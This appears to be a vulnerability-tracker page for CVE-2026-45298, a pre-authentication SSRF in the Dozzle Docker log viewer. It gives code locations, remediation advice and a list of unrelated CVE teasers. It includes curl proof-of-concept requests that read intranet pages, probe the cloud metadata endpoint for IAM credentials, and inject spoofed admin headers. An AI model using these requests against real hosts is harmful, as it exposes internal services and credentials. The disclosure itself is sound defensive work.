Dozzle CVE-2026-45298
HIGHSeverity by source
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
In a default dozzle deploy (the documented quickstart, no DOZZLE_AUTH_PROVIDER set), POST /api/notifications/test-webhook is reachable without authentication and forwards an attacker-controlled URL into a WebhookDispatcher that:
- Sends an HTTP POST to the supplied URL with attacker-controlled request headers, and
- Returns the response status code AND up to 1MB of the response body to the caller, when the target replies non-2xx.
This is a classic full-reflection SSRF, pre-auth, against any IP/port that dozzle's host can route to - including private subnets, link-local cloud metadata, and loopback services.
Affected versions
internal/notification/dispatcher/webhook.go and internal/web/notifications.go at commit 581bab3a43ead84ea4d009a469a17af98fb3377f and earlier (the test-webhook handler has been in place since the notifications subsystem was added).
Default-deploy reachability chain
main.go:58-59 → enforces AuthProvider in {none, forward-proxy, simple}
support/cli/args.go:18 → AuthProvider default is "none"
main.go:231-243 → when AuthProvider == "none", web.AuthProvider stays at NONE
internal/web/routes.go:130-132, 137-138 → auth middleware only registered if Provider != NONE
internal/web/routes.go:172-188 → /api/notifications/* (incl. /test-webhook) is inside that conditional GroupSo the default Quickstart deploy
docker run -v /var/run/docker.sock:/var/run/docker.sock -p 8080:8080 amir20/dozzle:latestexposes POST /api/notifications/test-webhook to the network without any authentication.
The vulnerable handler
// internal/web/notifications.go:652-716
func (h *handler) testWebhook(w http.ResponseWriter, r *http.Request) {
var input TestWebhookInput
if err := json.NewDecoder(r.Body).Decode(&input); err != nil { ... }
...
webhook, err := dispatcher.NewWebhookDispatcher("test", input.URL, templateStr, input.Headers)
...
result := webhook.SendTest(r.Context(), mockNotification)
...
writeJSON(w, http.StatusOK, &TestWebhookResult{
Success: result.Success,
StatusCode: statusCode,
Error: errStr,
})
}input.URL and input.Headers are entirely user-controlled. No host/IP/scheme validation anywhere.
The reflection sink
// internal/notification/dispatcher/webhook.go:88-120
req, err := http.NewRequestWithContext(ctx, http.MethodPost, w.URL, bytes.NewReader(payload))
...
for k, v := range w.Headers { req.Header.Set(k, v) }
...
resp, err := w.client.Do(req)
...
if resp.StatusCode < 200 || resp.StatusCode >= 300 {
limitedReader := io.LimitReader(resp.Body, 1024*1024) // 1 MB
responseBody, _ := io.ReadAll(limitedReader)
...
return TestResult{
Success: false,
StatusCode: resp.StatusCode,
Error: fmt.Sprintf("webhook returned status code %d: %s",
resp.StatusCode, string(responseBody)),
}
}When the SSRF target returns non-2xx, up to 1 MB of response body becomes part of Error, which is then JSON-encoded back to the attacker.
PoC
A. Read intranet admin-panel response bodies (most common path)
Most internal admin UIs respond to anonymous POST with 401/403 + an HTML or JSON body that contains version banners, CSRF tokens, internal hostnames, etc.
curl -X POST -H "Content-Type: application/json" \
-d '{"url":"http://192.168.1.1/admin/index.html","headers":{}}' \
http://dozzle.example.com/api/notifications/test-webhookResponse shape (writeJSON to the public Internet):
{
"Success": false,
"StatusCode": 401,
"Error": "webhook returned status code 401: <html><head>... full intranet HTML body, up to 1MB ...</html>"
}B. Cloud IMDS reachability probe
curl -X POST -H "Content-Type: application/json" \
-d '{"url":"http://169.254.169.254/latest/meta-data/iam/security-credentials/","headers":{}}' \
http://dozzle.example.com/api/notifications/test-webhookIf StatusCode == 200, IMDS is reachable. For AWS IMDSv2 the unauth POST returns 401 + body which IS reflected.
C. Header injection downstream
curl -X POST -H "Content-Type: application/json" \
-d '{
"url":"http://internal-api.example.com:8080/admin/users",
"headers":{"X-Forwarded-User":"admin","X-Real-IP":"127.0.0.1"}
}' \
http://dozzle.example.com/api/notifications/test-webhookSuggested fix
- Refuse
test-webhookwhenAuthorization.Provider == NONE. This is an admin-configuration helper; it should not be reachable on a deploy that has no concept of admin. - SSRF-harden
WebhookDispatcher. Resolve URL host once vianet.LookupIP; refuse private/loopback/link-local/CGNAT; pinhttp.Transport.DialContextto the resolved IP (closes DNS-rebinding TOCTOU). Refuse non-http(s) schemes. - Stop reflecting response body. UX for "test webhook" only needs
Success: bool, StatusCode: int.
Severity
- CVSS 3.1: High -
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N≈ 7.5 in default no-auth deploy. - Auth: none in default deploy. With
DOZZLE_AUTH_PROVIDER=simpleconfigured, the same primitive is post-auth.
Reproduction environment
- Tested against:
amir20/dozzle:8.xDocker image (commit581bab3a43ead84ea4d009a469a17af98fb3377f). - Code locations:
- Handler:
internal/web/notifications.go:652-716 - Sink:
internal/notification/dispatcher/webhook.go:88-120 - Auth gate:
internal/web/routes.go:130-138, 172-188 - Default provider:
internal/support/cli/args.go:18,main.go:231
Reporter
Eddie Ran. Filed via reporter API per dozzle's SECURITY.md.
AnalysisAI
Server-side request forgery in Dozzle (amir20/dozzle) versions through 8.14.12 allows remote unauthenticated attackers to coerce the Dozzle host into issuing arbitrary HTTP POST requests and reflects up to 1MB of the response body back. The flaw lives in POST /api/notifications/test-webhook, which is exposed without authentication in the documented default Docker quickstart deploy (DOZZLE_AUTH_PROVIDER unset). No public exploit identified at time of analysis, but a detailed proof-of-concept accompanies the GHSA advisory.
Technical ContextAI
Dozzle is a self-hosted real-time Docker log viewer written in Go that is commonly bound to the host's docker.sock and exposed on port 8080. The root cause is CWE-918 (Server-Side Request Forgery): the testWebhook handler in internal/web/notifications.go:652-716 deserializes a JSON body containing a fully attacker-controlled URL and header map, hands them to dispatcher.NewWebhookDispatcher, and the dispatcher (internal/notification/dispatcher/webhook.go:88-120) performs an http.Client.Do with no scheme, host, or IP validation. When the upstream responds non-2xx, up to 1MiB of the response body is concatenated into the Error field of the JSON response, producing a full read-SSRF primitive. Authentication is governed by internal/web/routes.go: the /api/notifications/* group is only wrapped in auth middleware when AuthProvider != NONE, and the default in support/cli/args.go:18 is NONE - so the documented quickstart leaves the sink reachable pre-auth. The CPE identifier is pkg:go/github.com_amir20_dozzle.
RemediationAI
No vendor-released patch identified at time of analysis (vulnerable range is documented as <= 8.14.12 with fixed-in: None), so the immediate compensating control is to set DOZZLE_AUTH_PROVIDER=simple (or forward-proxy) so the /api/notifications/* route group is wrapped in auth middleware - this converts the SSRF from pre-auth to post-auth without functional regression for log-viewing users, at the cost of requiring credentials for legitimate access. Until a release ships, restrict network reachability of the Dozzle port (8080) to trusted management networks via firewall/reverse-proxy ACLs, and block egress from the Dozzle container to RFC1918, 127.0.0.0/8, 169.254.0.0/16, and other internal ranges so SSRF cannot reach cloud IMDS or intranet hosts (trade-off: legitimate webhook destinations on private networks will also be blocked). The advisory's suggested upstream fixes - refuse test-webhook when AuthProvider==NONE, validate the resolved IP against private/loopback/link-local/CGNAT ranges, pin http.Transport.DialContext to the resolved IP to defeat DNS rebinding, restrict schemes to http(s), and stop reflecting the response body in the Error field - should be tracked at https://github.com/amir20/dozzle/security/advisories/GHSA-3v9w-6365-9w54 for the eventual patched release.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-3v9w-6365-9w54